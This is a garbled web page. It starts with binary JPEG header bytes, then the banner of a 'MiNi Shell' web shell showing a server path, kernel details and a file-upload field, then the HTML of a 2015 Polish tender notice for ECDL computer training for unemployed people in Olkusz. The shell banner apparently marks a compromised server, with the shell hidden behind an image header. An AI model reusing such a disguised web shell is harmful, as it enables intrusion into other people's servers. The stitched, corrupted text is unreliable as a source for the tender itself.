JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150917/243608-N-2015.html

<p class="kh_header"><b>Olkusz: Przeprowadzenie usługi szkolenia grupowego: Europejski Certyfikat Umiejętności komputerowych - ECDL BASE wraz z egzaminami PTI  dla 47 osób bezrobotnych zarejestrowanych   w Powiatowym Urzędzie Pracy w  Olkuszu w ramach projektu pn. Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy  w powiecie olkuskim (I) w ramach Działania 8.1. Aktywizacja Zawodowa - projekty Powiatowych Urzędów Pracy w ramach 8 osi Priorytetowej Rynek Pracy Regionalnego Programu Operacyjnego  Województwa Małopolskiego na lata 2014-2020</b><br>
<b>Numer ogłoszenia: 243608 - 2015; data zamieszczenia: 17.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Minkiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6434348, faks 032 6430538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usługi szkolenia grupowego: Europejski Certyfikat Umiejętności komputerowych - ECDL BASE wraz z egzaminami PTI  dla 47 osób bezrobotnych zarejestrowanych   w Powiatowym Urzędzie Pracy w  Olkuszu w ramach projektu pn. Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy  w powiecie olkuskim (I) w ramach Działania 8.1. Aktywizacja Zawodowa - projekty Powiatowych Urzędów Pracy w ramach 8 osi Priorytetowej Rynek Pracy Regionalnego Programu Operacyjnego  Województwa Małopolskiego na lata 2014-2020.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie usługi szkolenia grupowego dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Olkuszu w ramach projektu  pn. Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy  w powiecie olkuskim (I) w ramach Działania 8.1. Aktywizacja Zawodowa - projekty Powiatowych Urzędów Pracy w ramach 8 osi Priorytetowej Rynek Pracy Regionalnego Programu Operacyjnego  Województwa Małopolskiego na lata 2014-2020.
2. Szczegółowy opis przedmiotu zamówienia:
Przeprowadzenie usługi szkolenia: Europejski Certyfikat Umiejętności Komputerowych - ECDL BASE wraz z egzaminami PTI   dla 47 osób w 3 grupach:
- 1- sza grupa 16 osób
- 2- ga grupa  16 osób
- 3- cia grupa 15 osób
w terminach wskazanych przez Powiatowy Urząd Pracy w Olkuszu
Nazwa i kod dotyczący przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień (CPV): 
 80533100-0 usługi szkolenia komputerowego

3. Wymagana liczba godzin usługi szkoleniowej dla każdej grupy  wynosi 60 godzin zegarowych oraz  egzamin PTI z każdego modułu.



4. Program szkolenia powinien przygotować do egzaminu  ECDL BASE i ma obejmować  4 moduły:
1) Podstawy pracy z komputerem 	(BASE - B1)
2) Podstawy Pracy w sieci	 	(BASE - B2)
3) Przetwarzanie tekstów 		(BASE - B3)
4) Arkusze kalkulacyjne		(BASE - B4)

Do powyższych tematów zajęć edukacyjnych należy  podać szczegółowe  treści szkolenia  wymiar godzin zajęć teoretycznych   i praktycznych.

Po zakończeniu każdego z w/w modułów szkoleniowych Wykonawca winien zapewnić uczestnikom szkolenia przystąpienie do egzaminu ECDL BASE, który musi zostać przeprowadzony zgodnie z zasadami administratora standardu ECDL w Polsce tj. Polskiego Towarzystwa Informatycznego i działającego przy nim Polskiego Biura ECDL.

W  cenę szkolenia należy wliczyć koszt w/w egzaminów  oraz  koszt wydania certyfikatu ECDL BASE w postaci papierowej.

5. Program należy sporządzić na załączniku nr  9 do SIWZ

6. Liczebność grupy skierowanej przez Powiatowy Urząd Pracy w Olkuszu nie może być zwiększona o osoby z wolnego naboru.

7. Zamówienie ma być przeprowadzone zgodnie z programem szkolenia, który powinien być dostosowany odpowiednio do identyfikowalnego na rynku pracy zapotrzebowania na kwalifikacje.
8. Wykonawca w celu podnoszenia jakości prowadzonego szkolenia zapewnia wysoką jakość oferowanego programu oraz nadzór wewnętrzny.
9. Program szkolenia winien być opracowany zgodnie z  Rozporządzeniem Ministra Pracy  i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków realizacji oraz trybu i sposobów prowadzenia usług rynku pracy (Dz. U. z 2014 r. poz. 667) i powinien zawierać  w szczególności:
a)	nazwę  szkolenia,
b)	czas trwania i sposób organizacji szkolenia,
c)	wymagania wstępne dla uczestników szkolenia,
d)	cele szkolenia ujęte w kategoriach efektów uczenia się z uwzględnieniem wiedzy, umiejętności  i kompetencji społecznych;
e)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem w miarę potrzeby, części teoretycznej i części praktycznej,
f)	opis treści - kluczowe punkty szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h)	przewidziane sprawdziany i egzaminy.

10. Szkolenie ma odbywać się według   planu  nauczania   obejmującego     przeciętnie nie   mniej niż 25 godzin zegarowych  w tygodniu.
Przyjmuje się, że:
- jedna godzina zajęć teoretycznych równa się 60 minutom i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą 15 minut,
- jedna godzina zajęć  praktycznych równa się 60 minutom bez przerwy.
11. Czas trwania  szkolenia  oraz przeprowadzenia egzaminów  z każdego  modułu   nie może być dłuższy niż 16  dni roboczych. 
12. Minimalna liczba godzin szkoleniowych w ciągu jednego dnia  ma wynosić 5 godzin
zegarowych, tygodniowo co najmniej 25 godzin zegarowych.

13. Zamawiający nie dopuszcza możliwości prowadzenia szkolenia metodą  e- learning.

14. Celem szkolenia  jest dostarczenie uczestnikom niezbędnej wiedzy  i umiejętności potrzebnych do   zdania egzaminu ECDL BASE z każdego niżej wymienionego modułu:
1) Podstawy pracy z komputerem 	(BASE - B1)
2) Podstawy Pracy w sieci	 	(BASE - B2)
3) Przetwarzanie tekstów 		(BASE - B3)
4) Arkusze kalkulacyjne		(BASE - B4)
15. Zajęcia mają być realizowane wyłącznie w dni robocze tj. od poniedziałku do piątku .                 

16. Zajęcia muszą odbywać się w pomieszczeniu/ach/ dostosowanym/ ych/ do prowadzenia
zajęć szkoleniowych i odpowiednio w tym celu wyposażonym/ ych/  tj. w pomieszczeniach
posiadających odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe.

17. Wymaga się prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
1) dziennik zajęć edukacyjnych zawierający tematy i wymiar godzin zajęć edukacyjnych oraz listę obecności  zawierającą: imię i nazwisko i podpis uczestnika szkolenia, 
2) protokół i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu końcowego,             
3) rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji zawierający: numer, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a przypadku  cudzoziemca numer dokumentu stwierdzającego tożsamość, oraz nazwę szkolenia i datę wydania  zaświadczenia.     
18. Wykonawca dostosuje kwalifikacje i doświadczenie kadry dydaktycznej do zakresu szkolenia. Wymaga się, aby każdy z  wykładowców posiadał co najmniej:
1) łącznie roczne doświadczenie w prowadzeniu zajęć związanych z przedmiotem zamówienia,
2) uprawnienia pedagogiczne (ukończony kurs pedagogiczny, studium  pedagogiczne, studia pedagogiczne lub inny  dokument uprawniający do prowadzenia zajęć).
18.1. Wykonawca zapewni co najmniej 1 egzaminatora, posiadającego aktualne uprawnienia do przeprowadzenia egzaminów ECDL BASE.
19. Wyposażenie dydaktyczne i pomieszczenia mają być dostosowane do potrzeb szkolenia 
z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.

20. Wykonawca zapewni pomieszczenia, w których odbywać się będą egzaminy ECDL
BASE. Pomieszczenia powinny w pełni wyposażone i umożliwiające przeprowadzenie
egzaminu ECDL BASE. 
21. W ramach zajęć praktycznych Wykonawca  zabezpiecza  sprzęt techniczny oraz materiały
do   zajęć praktycznych, a także pomieszczenia do potrzeb szkolenia,  z uwzględnieniem
bezpiecznych i higienicznych warunków realizacji szkolenia oraz przepisów p. poż. 
22. Wykonawca musi zapewnić sprawne komputery z odpowiednim oprogramowaniem równą liczbie uczestników kursu, aby zapewnić każdemu uczestnikowi indywidualny dostęp do sprzętu wykorzystywanego przy realizacji szkolenia. 
23. W  budynku,  w którym odbywają się zajęcia zapewniony musi być dostęp do pomieszczeń sanitarnych   (w tym dostęp do WC zaopatrzonego w środki higieniczne) oraz do zaplecza socjalnego.
24. Uczestnicy w ramach organizowanego  szkolenia powinni być objęci opieką z ramienia instytucji szkoleniowej.  Każde szkolenie powinno mieć swojego opiekuna, osobę odpowiedzialną za organizację i realizację szkolenia, wskazaną do kontaktu w umowie stanowiącej załącznik nr 6 do SIWZ.
25. Wykonawca jest zobowiązany do sprawdzania efektów szkolenia na poszczególnych jego
etapach wybranymi przez  siebie metodami.
 
28.W ramach udzielonego zamówienia Wykonawca zobowiązany jest do wydania uczestnikom szkolenia:
1) zaświadczenia lub innego dokumentu potwierdzającego ukończenie kursu zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej  z dnia 14 maja 2014 r. w sprawie szczegółowych warunków realizacji oraz trybu i sposobów prowadzenia usług rynku pracy (Dz. U. z 2014 r. poz. 667)  zawierającego:
a) numer z rejestru, 
b) imię i   nazwisko oraz   numer   PESEL uczestnika   szkolenia a w przypadku   
    cudzoziemca numer  dokumentu stwierdzającego tożsamość,
c) nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
d) formę i nazwę szkolenia,
e) okres trwania szkolenia,
f) miejsce  i datę  wydania zaświadczenia   lub   innego dokumentu   potwierdzającego   
    ukończenie     szkolenia  i uzyskanie umiejętności lub kwalifikacji,
g) tematy i wymiar godzin zajęć edukacyjnych,
h) podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie
oraz zawierające:
 - znak  Funduszy  Europejskich  i   Programu  Regionalnego,  znak Unii   Europejskiej
  z nazwą Europejski Fundusz Społeczny oraz oficjalne logo promocyjne województwa 
    małopolskiego zgodnie z zasadą wizualizacji,  a także informacje: 

Szkolenie realizowane w ramach projektu pn. Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy  w powiecie  olkuskim (I)  w ramach Działania 8.1. Aktywizacja Zawodowa - projekty Powiatowych Urzędów Pracy w ramach 8 osi Priorytetowej Rynek Pracy Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata   2014-2020

Znak Funduszy Europejskich i Programu Regionalnego, znak Unii Europejskiej z nazwą Europejski Fundusz Społeczny oraz oficjalne logo promocyjne województwa małopolskiego do pobrania ze strony internetowej: www.pup-olkusz.pl/ Zamówienia publiczne/pobierz logo

2) zaświadczenia na druku MEN jeśli instytucja posiada możliwość jego wystawienia.
3) certyfikat ECDL BASE w postaci papierowej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż posiada aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz. U. z 2015r poz. 149)  i Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (t. j. Dz. U. z 2014r.   poz. 781). Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykonał  z należytą starannością, w ciągu ostatnich      3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę szkolenia grupowego (dla min. 10 osób)          o tematyce tożsamej z przedmiotem zamówienia lub zawierającego co najmniej 70% wymaganego przez Zamawiającego minimum programowego wskazanego w przedmiocie zamówienia. 
Na potwierdzenie powyższego warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru z załącznika nr 2 SIWZ.Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału 
w postępowaniu, o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych dotyczące dysponowania odpowiednim potencjałem technicznym 
Na potwierdzenie powyższego warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru z załącznika nr 2 SIWZ.Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby każdy z  wykładowców posiadał co najmniej:
a)	łącznie roczne doświadczenie w prowadzeniu zajęć związanych z przedmiotem zamówienia,
b)	uprawnienia pedagogiczne (ukończony kurs pedagogiczny, studium  pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć).
Ponadto Wykonawca zapewni co najmniej 1 egzaminatora, posiadającego aktualne uprawnienia do przeprowadzenia egzaminów ECDL BASE.
Na potwierdzenie powyższego warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru z załącznika nr 2 SIWZ.Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału 
w postępowaniu, o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych dotyczące sytuacji ekonomicznej i finansowej.Na potwierdzenie powyższego warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru z załącznika nr 2 SIWZ.Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych   w art. 22 ust. 1 ustawy Prawo zamówień publicznych, według wzoru na załączniku nr 2 SIWZ .2. Oświadczenie o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2015r. poz. 149) i Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236 poz. 2365 z późń. zm.) - załącznik nr 4 SIWZ. 3. Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 7 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ilość osób przeszkolonych w ciągu ostatniego roku przed upływem terminu składania ofert - 20</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatów jakości usług - 5</li>
<li>4 - Rodzaj dokumentu potwierdzającego ukończenia szkolenia i uzyskanie kwalifikacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość zmiany postanowień umowy, której wzór stanowi załącznik nr 6 SIWZ. Zmiany mogą dotyczyć:
a)  zmiany  terminu przeprowadzenia szkolenia  (za zgodą Zamawiającego),
b)  zmiany Wykładowcy wynikającej  z przyczyn losowych, pod warunkiem zabezpieczenia innej osoby zdolnej do realizacji zamówienia, spełniającej wymagania określone                  w SIWZ (za zgodą Zamawiającego),
c)   zmiany miejsca szkolenia, pod warunkiem zabezpieczenia miejsca spełniającego wymogi określone  w SIWZ (za zgodą Zamawiającego).
d)  zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy określonego w § 1 umowy szkoleniowej oraz tego, że plan nauczania będzie obejmował przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach (za zgodą Zamawiającego).

Warunkiem dokonania zmiany jest zawiadomienie przez Wykonawcę o zaistnieniu w/w okoliczności w formie pisemnej i uzyskaniu pisemnej zgody Zamawiającego.
Ewentualne wprowadzenie wskazanych powyżej zmian do umowy nie może skutkować zwiększeniem wynagrodzenia wynikającego z tytułu realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-olkusz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Olkuszu
